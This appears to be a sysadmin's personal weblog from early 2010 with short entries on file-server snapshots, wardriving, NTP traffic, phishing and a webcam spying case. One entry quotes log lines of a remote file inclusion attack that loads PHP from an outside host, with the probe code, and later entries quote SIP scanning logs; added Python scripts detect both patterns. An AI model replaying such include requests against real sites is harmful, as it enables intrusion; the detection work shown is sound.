2010-03-17 (#) 1 day ago
One of our users at work reported today that he noticed the 'Previous Versions' tab in windows explorer being active and showing what we think of as the snapshots of the NetApp fileserver. I tried it myself on the windows 2008 terminal server and it works as it should. As my boss noted this is a very important step: having snapshots available is one thing, but having them available in the standard interface which (experienced) windows users can use makes quite a difference. Helpdesk page about filesystem snapshots updated.
2010-03-14 (#) 3 days ago
Looking for that quiet, remote and very, very, very sturdy place to call home? Try the Atlas F missile base, Adirondack Mtns, NY with features like
"The original, heavy security doors are built to withstand a 2000 lb blast and are at the underground home entrance."
and
"Huge doors open to a large tunnel that accesses the silo that has an additional 20,000 square feet of useable space with unlimited possibilities. The perfect getaway home, it has its own direct runway access, it's climate controlled and is capable of withstanding a nuclear hit."
It's also easy to reach:
"The Silo has a climate constant/approx. 58 degree earth ambient temperature. It is 52' diameter x 178' deep / 9 floor steel superstructure. Entire steel superstructure hangs from gigantic spring suspension system designed to absorb shock of a direct nuclear hit.
it is part of an exclusive airport subdivision on a (FAA approved) 2050' runway. (It is fully accessible by road too)."
Cheap too: only 2.3 million US dollar. Found via It's WAR - lovelylisting
2010-03-08 (#) 1 week ago
Blast from the past today: I tried to subscribe to a surfnet mailinglist and the response had this bit of information:
Summary of resource utilization
-------------------------------
 CPU time:        0.000 sec         Device I/O:    19
 Overhead CPU:    0.016 sec         Paging I/O:   143
 CPU model:       2-CPU 2.5GHz Xeon L5420 6M (2048M)
I remember these lines in status messages when I first got in touch with mailing lists and listservers in 1992. Back then LISTSERV mostly ran on mainframes where this type of information at the end of a job was normal. Messages from LISTSERV used to have as subject back then "Output of job .." suggesting real batch processing.
2010-03-08 (#) 1 week ago
Interesting weather this morning: snow started between 7 and 8, and it was nearly melted away again before 11. Overview on webcam.idefix.net Uithof archive Monday 8 March 2010.
2010-03-08 (#) 1 week ago
Wardriving results 2 February - 7 March 2010: 4204 new networks with GPS locations according to WiGLE. Wardriving areas of the city I haven't visited in a while yields large numbers of new networks at the moment. I guess a lot of people have upgraded their wireless access-points.
2010-03-05 (#) 1 week ago
Searching for "idefix.net" to see whether it was listed in some overview of websites with certain vulnerable software I found this gem: idefix-net on Facebook Indonesia. I guess I have some sort of second career I never knew about.
2010-03-04 (#) 1 week ago
It seems the Turkish provider ttnet.tr fell off the Internet for a few hours today. Since we volunteered ntp.cs.uu.nl for tr.pool.ntp.org the drop in traffic was very, very noticeable.
2010-03-04 (#) 2 weeks ago
Writing about security on your website has this interesting effect in the logs:
200.93.147.154 - - [04/Mar/2010:09:58:35 +0100] "GET /~koos/newstag.cgi/security/administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0"
200.93.147.154 - - [04/Mar/2010:09:58:35 +0100] "GET /~koos/newstag.cgi/security%20%20/administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0"
200.93.147.154 - - [04/Mar/2010:09:58:41 +0100] "GET /~koos/newstag.cgi/security%20%20/administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0"
The content of heheh.txt is predictable:
<?php /* Fx29ID */ echo("FeeL"."CoMz"); die("FeeL"."CoMz"); /* Fx29ID */ ?>
By pure coincidence there is a file http://zerozon.co.kr/data/eeng/id1.txt with the contents:
<?php /* ZFxID */ echo("Shiro"."Hige"); die("Shiro"."Hige"); /* ZFxID */ ?>
And that all looks very familiar: Fx29Shell php attack. This won't keep me from writing about security or amusing myself by browsing the logfiles. Maybe I'll find a fresh attack. This automated one is getting really boring.
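A way to pull this kind of probe out of an access log automatically, as an added example that is not part of the original post: it flags any query parameter whose decoded value is an absolute URL, as with mosConfig_live_site above. The function names, the sample addresses and the host files.example are assumptions made for the illustration.

```python
import re
from collections import Counter
from urllib.parse import parse_qsl

# Apache common/combined format: client, identd, user, [time], "request", status, size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
# A query value that is itself an absolute URL is the mark of an include probe.
REMOTE_URL_RE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)

def find_rfi_probes(lines):
    """Return one record per query parameter whose decoded value is a remote URL."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not access-log entries
        path, _, query = m["target"].partition("?")
        # parse_qsl percent-decodes, so http%3A%2F%2F... is caught as well
        for name, value in parse_qsl(query, keep_blank_values=True):
            if REMOTE_URL_RE.match(value):
                hits.append({
                    "ip": m["ip"], "time": m["ts"], "path": path, "param": name,
                    "url": value.rstrip("?"),  # drop the scanner's trailing '???'
                    "served": m["status"].startswith("2"),  # 2xx: a real script answered
                })
    return hits

def probes_per_client(hits):
    """Count probes per source address, busiest first."""
    return Counter(h["ip"] for h in hits).most_common()

# Constructed sample lines (documentation addresses and host names, not real traffic)
SAMPLE = [
    '192.0.2.10 - - [04/Mar/2010:09:58:35 +0100] "GET /a/admin.a6mambohelpdesk.php'
    '?mosConfig_live_site=http://files.example/probe.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0"',
    '192.0.2.10 - - [04/Mar/2010:09:58:41 +0100] "GET /b%20/admin.a6mambohelpdesk.php'
    '?mosConfig_live_site=http://files.example/probe.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0"',
    '198.51.100.7 - - [04/Mar/2010:10:02:11 +0100] "GET /index.php'
    '?mosConfig_live_site=http%3A%2F%2Ffiles.example%2Fprobe.txt HTTP/1.0" 200 312 "-" "-"',
    '203.0.113.5 - - [04/Mar/2010:10:03:00 +0100] "GET /newstag.cgi/security?page=2 '
    'HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, count in probes_per_client(find_rfi_probes(SAMPLE)):
        print(ip, count)
```

Hits with "served" set deserve attention first; 404s like the ones in the excerpt only show that the scanner guessed wrong.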
2010-03-03 (#) 2 weeks ago
Yes, took the step. The homepage lives at http://idefix.net/ and the old url redirects. And will have to keep doing that for at least 10 years. Or maybe more, the url for my homepage that was valid until August 2000 still has a working redirect. I'm not moving anything else because that would confuse me too much. So the base href in the html source has to stay.
2010-03-02 (#) 2 weeks ago
A ~ in your homepage URL is somewhat very nineties so I started making http://idefix.net/ also point at my homepage and I moved the original content of that page to idefix.net history. I'm now wondering whether I should redirect http://idefix.net/~koos/ to the new location (migrating all links in for example search engines) or let both point at the same page.. or what.
I found some discussions on the tilde in the url. Jukka Korpela has an article Why tilde (~) should not be used in Web addresses (URLs) which explains why this unixism is a bad idea in the modern web and the explanation Get Clues from URLs notes:
"Most servers use the ~ symbol to represent the personal directories of individuals. If the URL contains a tilde then be aware that you are probably (although not definitely) looking at a personal page with personal opinions rather than an official site giving the official line."
Well, as I am the owner of idefix.net there should not be any difference between my opinion and the official opinion of the site.
At work we also got rid of the tildes ages ago so maybe I should just follow the sign of the times. Being good webmasters the old urls still work: http://www.cs.uu.nl/~koos/ will redirect to http://people.cs.uu.nl/koos/.
Enough rambling: to me this change was reason for a bump in the minor version number of the homepage.
2010-03-01 (#) 2 weeks ago
First peak at 5000 packets/second ntp traffic seen on ntp.cs.uu.nl. Still going strong under this load.
2010-02-24 (#) 3 weeks ago
I just noticed something: the archive of webcam.idefix.net in the Uithof in Utrecht now covers a longer period (now 3 years and approximately 3 months) than the archive of webcam.idefix.net at the Beneluxlaan in Utrecht (which stopped just a bit over 2 years). How time flies.
2010-02-24 (#) 3 weeks ago
Lots of phishing attempts for webmail accounts flying by, at the moment it seems popular to use webform hosters to ask for account credentials. I seem to miss a part of these. Probably my spamfilters being too good or something. But at work there are some people who know I am interested in new and recurring strains of Internet abuse so I still get interesting stuff forwarded to investigate. The latest catch advertised a dot.tk domain which inlined a webform from a tripod hosted site which was a copy of an emailmeform.com form and used emailmeform.com to process it and redirected to a generic thankyou form by a New Zealand printer supplies company. It takes a bit of tracing and trying to solve such a puzzle and notify all parties about their role in the abuse.
2010-02-24 (#) 3 weeks ago
By now a lot of people in the world are aware of the case of a school in Pennsylvania, US, that was accused of using webcams in school-issued laptops to spy on students at home without their consent (via Slashdot). A lot of theories and weird stories are going around but I found a good technical explanation: The Spy at Harrington High - Stryde Hax who as a bystander and with his technical background has done a thorough analysis of the techniques used and the stance of the people involved in this matter. Good reading material for those who are actually interested in what was really happening.
The original story seems to be turning into this 'Only in America' story: School spying scandal gets even more bizarre - Slashdot:
"The student in question that was disciplined for an "improper act" was apparently accused of either drug use or drug selling. Turns out he was eating Mike & Ike candy, not popping pills."
If you want to detect LANRev Agent on a system, Network Fingerprint for LANRev Agent - Stryde Hax has the answer.
2010-02-22 (#) 3 weeks ago
SIP scanning is active again. Sandro Gauci came with a link to And the scanning just keeps on coming. I checked the logs on 2 asterisk servers for recent break-in attempts and presto... from different IPs, but the pattern I saw before in trying to find insecure SIP servers:
[Feb 21 10:09:20] NOTICE[6890] chan_sip.c: Registration from '"3776548202"<sip:3776548202@xxx.yyy.zzz.xxx>' failed for '96.57.107.3' - No matching peer found
[Feb 21 10:09:20] NOTICE[6890] chan_sip.c: Registration from '"100"<sip:100@xxx.yyy.zzz.xxx>' failed for '96.57.107.3' - No matching peer found
[Feb 21 10:09:20] NOTICE[6890] chan_sip.c: Registration from '"101"<sip:101@xxx.yyy.zzz.xxx>' failed for '96.57.107.3' - No matching peer found
[Feb 21 10:09:20] NOTICE[6890] chan_sip.c: Registration from '"102"<sip:102@xxx.yyy.zzz.xxx>' failed for '96.57.107.3' - No matching peer found
[Feb 21 10:09:28] NOTICE[6890] chan_sip.c: Registration from '"952"<sip:952@xxx.yyy.zzz.xxx>' failed for '96.57.107.3' - No matching peer found
[Feb 21 10:09:28] NOTICE[6890] chan_sip.c: Registration from '"953"<sip:953@xxx.yyy.zzz.xxx>' failed for '96.57.107.3' - No matching peer found
[Feb 21 10:09:28] NOTICE[6890] chan_sip.c: Registration from '"954"<sip:954@xxx.yyy.zzz.xxx>' failed for '96.57.107.3' - No matching peer found
No damage and no costs. The other server shows attempts to use the sip guest environment again:
[Feb 13 05:27:08] NOTICE[5710] chan_sip.c: Call from '' to extension '90442075821233' rejected because extension not found.
[Feb 13 05:27:27] NOTICE[5710] chan_sip.c: Call from '' to extension '9442078493108' rejected because extension not found.
[Feb 13 05:27:38] NOTICE[5710] chan_sip.c: Call from '' to extension '0442076311117' rejected because extension not found.
[Feb 13 05:27:40] NOTICE[5710] chan_sip.c: Call from '' to extension '0011447850019298' rejected because extension not found.
[Feb 13 05:27:42] NOTICE[5710] chan_sip.c: Call from '' to extension '00011441628481177' rejected because extension not found.
[Feb 13 05:27:44] NOTICE[5710] chan_sip.c: Call from '' to extension '0001441383417547' rejected because extension not found.
[Feb 13 05:27:56] NOTICE[5710] chan_sip.c: Call from '' to extension '0000447956581268' rejected because extension not found.
[Feb 13 05:27:57] NOTICE[5710] chan_sip.c: Call from '' to extension '00011441628481177' rejected because extension not found.
[Feb 13 05:28:08] NOTICE[5710] chan_sip.c: Call from '' to extension '900442075964032' rejected because extension not found.
[Feb 13 05:28:08] NOTICE[5710] chan_sip.c: Call from '' to extension '9011441252625280' rejected because extension not found.
[Feb 13 05:28:09] NOTICE[5710] chan_sip.c: Call from '' to extension '1442074370973' rejected because extension not found.
[Feb 13 05:28:10] NOTICE[5710] chan_sip.c: Call from '' to extension '9442078493108' rejected because extension not found.
[Feb 13 05:28:10] NOTICE[5710] chan_sip.c: Call from '' to extension '00000447889904142' rejected because extension not found.
[Feb 13 05:28:10] NOTICE[5710] chan_sip.c: Call from '' to extension '0001441383417547' rejected because extension not found.
This time with somewhat random looking phone numbers in the UK which aren't well-known to google.
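The registration pattern in the first excerpt (one source walking through many usernames within seconds) can be picked out of an Asterisk log mechanically. This is an added example, not part of the original post; the threshold, the window, the function names and the sample addresses and host pbx.example are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# chan_sip NOTICE line for a rejected REGISTER, in the shape quoted above
REG_RE = re.compile(
    r"^\[(?P<ts>\w{3} +\d+ [\d:]{8})\] NOTICE\[\d+\] chan_sip\.c: Registration from "
    r"'\"(?P<user>[^\"]*)\"<sip:[^>]*>' failed for '(?P<ip>[^']+)' - (?P<reason>.+)$"
)

def parse_ts(text, year):
    # these log timestamps carry no year, so the caller has to supply it
    return datetime.strptime(f"{year} {text}", "%Y %b %d %H:%M:%S")

def registration_scanners(lines, year=2010, min_users=5, window=timedelta(seconds=60)):
    """Map source IP -> usernames tried, for sources that attempted at least
    min_users distinct usernames inside one sliding time window."""
    attempts = defaultdict(list)  # ip -> [(time, username)]
    for line in lines:
        m = REG_RE.match(line.strip())
        if m:
            attempts[m["ip"]].append((parse_ts(m["ts"], year), m["user"]))
    flagged = {}
    for ip, events in attempts.items():
        events.sort()
        start = 0
        for end in range(len(events)):
            while events[end][0] - events[start][0] > window:
                start += 1  # shrink the window from the left
            if len({user for _, user in events[start:end + 1]}) >= min_users:
                flagged[ip] = sorted({user for _, user in events})
                break
    return flagged

# Constructed sample: one enumerating source, one phone with a wrong password
SAMPLE = [
    "[Feb 21 10:09:20] NOTICE[6890] chan_sip.c: Registration from "
    f"'\"{user}\"<sip:{user}@pbx.example>' failed for '192.0.2.50' - No matching peer found"
    for user in ("5550100", "100", "101", "102", "103")
] + [
    "[Feb 21 10:15:02] NOTICE[6890] chan_sip.c: Registration from "
    "'\"201\"<sip:201@pbx.example>' failed for '198.51.100.9' - Wrong password",
]

if __name__ == "__main__":
    for ip, users in registration_scanners(SAMPLE).items():
        print(ip, "tried", len(users), "usernames:", ", ".join(users))
```

Counting distinct usernames rather than raw failures keeps a single misconfigured phone that retries one account from being flagged.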
2010-02-22 (#) 3 weeks ago
Today's xkcd is very amusing! As a system administrator I can imagine the need for making sure important infrastructure like the blog of a cat.
2010-02-19 (#) 3 weeks ago
Friday, time for the Friday Afternoon URL page which you can also follow on twitter as @fridayaftURL to get fresh Friday Afternoon URLs in your twitter feed!
2010-02-18 (#) 3 weeks ago
No license to rdesktop for me: I recently got a really weird error from rdesktop:
koos@leek:~$ rdesktop -M -g 1200x900 -d something terminalserver
Autoselected keyboard map en-us
disconnect: No valid license available.
Some searching found me: License to rdesktop. Indeed, setting a different hostname from my own hostname helps:
koos@leek:~$ rdesktop -M -g 1200x900 -d something -n leeks terminalserver
Autoselected keyboard map en-us
/users/koos/.rdesktop/licence.leeks.new: Permission denied
WARNING: Remote desktop does not support colour depth 24; falling back to 16
The license file error has to do with another workaround. But maybe the running out of licenses for 'leek' is because I never give licenses back. Why is all this software very busy with making sure money is made for its maker and not busy with helping the user?
2010-02-17 (#) 4 weeks ago
The EFF has written an article Music Journalism is the New Piracy. The music industry seems to have the intention of thoroughly destroying itself, and that destruction will be celebrated by music fans worldwide. Found via Is There Any Way To Be A Music Blogger Without Risking Takedown? at Techdirt.
Or as Boingboing put it: Music industry to musicbloggers: there's no point in obeying the law.